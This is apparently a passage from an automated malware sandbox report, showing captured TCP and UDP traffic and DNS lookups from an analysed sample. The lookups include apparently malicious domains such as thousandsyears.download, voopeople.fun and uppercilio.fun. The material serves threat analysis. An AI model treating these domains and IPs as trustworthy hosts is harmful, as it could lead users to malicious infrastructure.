                                                                                                                                                                                                                Jul 6, 2021 15:17:39.265312910 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.265453100 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.266299009 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.266325951 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.266535044 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.267394066 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.267421007 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.268438101 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.268848896 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.268877029 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.268908978 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.269567966 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.269629955 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.269855022 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.270651102 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.270708084 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.270920992 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.271708012 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.271735907 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.271950960 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.272727966 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.272756100 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.273839951 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.273890018 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.273931980 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.273974895 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.274939060 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.275140047 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.276156902 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.276236057 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.276277065 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.276849985 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.277112961 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.277138948 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.277267933 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.278147936 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.278171062 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.278276920 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.279247999 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.279311895 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.279453993 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.280344963 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.300996065 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.301300049 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.301316977 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.301321983 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.301548004 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.302258968 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.352497101 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.352520943 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.352633953 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.352837086 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.352857113 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.352993965 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.353621960 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.353710890 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.353799105 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.354326010 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.354371071 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.355143070 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.355143070 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.355206013 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.355317116 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.355915070 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.355937004 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.355979919 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.356733084 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.356818914 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.356921911 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.357516050 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.357537031 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.357579947 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.358264923 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.358287096 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.358480930 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.359069109 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.359144926 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.359318018 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.359807014 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.359831095 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.359882116 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.360635042 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.360665083 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.360698938 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.361385107 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.361411095 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.361447096 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.362210989 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.362241030 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.362925053 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.362977028 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.363004923 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.363198996 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.363765001 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.363797903 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.364532948 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.364581108 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.364645004 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.364707947 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.365354061 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.365401983 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.365665913 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.366136074 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.366173983 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.366271973 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.366918087 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.366940022 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.367047071 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.367731094 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.367851973 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.367980003 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.368530035 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.368562937 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.369261026 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.369285107 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.369689941 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.369805098 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.370054960 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.370080948 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.370117903 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.390824080 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.390862942 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.391036987 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.391067982 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.391385078 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.391401052 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.392456055 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.392488956 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.392847061 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.393107891 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.393142939 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.393398046 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.393495083 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.393523932 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.394103050 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.394309044 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.394342899 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.394536972 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.395103931 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.395152092 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.395505905 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.395853043 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.395982027 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.396619081 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.396678925 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.396704912 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.396816969 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.397433043 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.397454023 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.397514105 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.398189068 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.398211002 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.398458958 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.398988962 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.399008989 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.399046898 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.399787903 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.399816990 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.399878025 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.400552034 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.400573015 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.400799990 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.401370049 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.401441097 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.401662111 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.402126074 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.402173042 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.402879000 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.402896881 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.402929068 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.403251886 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.404616117 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.404652119 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.404675961 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.404694080 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.404977083 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.405253887 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.405282021 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.405380011 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.406049967 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.406090975 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.406182051 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.406832933 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.406852961 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.406971931 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.442220926 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.442260981 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.442286968 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.442356110 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.442473888 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.442498922 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.442522049 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.442565918 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.442575932 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.443320990 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.443361998 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.443388939 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.443432093 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.444111109 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.444144011 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.444174051 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.444233894 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.444245100 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.445173979 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.445204973 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.445234060 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.445327997 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.445707083 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.445739985 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.445765972 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.445975065 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.446518898 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.446549892 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.446578979 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.446825027 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.447344065 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.447376013 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.447396994 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.448406935 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.654531956 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.722223043 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.762443066 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.762584925 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.763216972 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.802831888 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:40.299678087 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:40.299702883 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:40.299767017 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                                                Jul 6, 2021 15:17:42.132797003 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                                                Jul 6, 2021 15:17:42.132886887 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                                Jul 6, 2021 15:19:29.192071915 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                                                Jul 6, 2021 15:19:29.192332983 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                Jul 6, 2021 15:19:29.192569017 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                                Jul 6, 2021 15:19:29.231220961 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:19:29.231404066 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                                                Jul 6, 2021 15:19:29.231713057 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:19:29.231775999 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                Jul 6, 2021 15:19:29.234769106 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:19:29.234858036 CEST4916780192.168.2.22172.67.198.51

                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.218952894 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.283243895 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.446280956 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.507091999 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.671020031 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.731672049 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.453746080 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.511235952 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.534708023 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.597353935 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:31.900122881 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:31.960684061 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:31.974066973 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:32.042804956 CEST53560098.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.020195961 CEST6186553192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.085537910 CEST53618658.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.213159084 CEST5517153192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:34.270649910 CEST53551718.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.092585087 CEST5249653192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.148252964 CEST53524968.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.215624094 CEST5756453192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:36.277646065 CEST53575648.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.298192024 CEST6300953192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.353192091 CEST53630098.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.370820045 CEST5931953192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:38.431219101 CEST53593198.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.599623919 CEST5307053192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.655723095 CEST53530708.8.8.8192.168.2.22
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.663353920 CEST5977053192.168.2.228.8.8.8
                                                                                                                                                                                                                Jul 6, 2021 15:17:39.720768929 CEST53597708.8.8.8192.168.2.22

                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.218952894 CEST192.168.2.228.8.8.80x1168Standard query (0)thousandsyears.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.446280956 CEST192.168.2.228.8.8.80xc896Standard query (0)voopeople.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:29.671020031 CEST192.168.2.228.8.8.80x2c09Standard query (0)uppercilio.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                Jul 6, 2021 15:17:30.453746080 CEST192.168.2.228.8.8.80xaa88Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
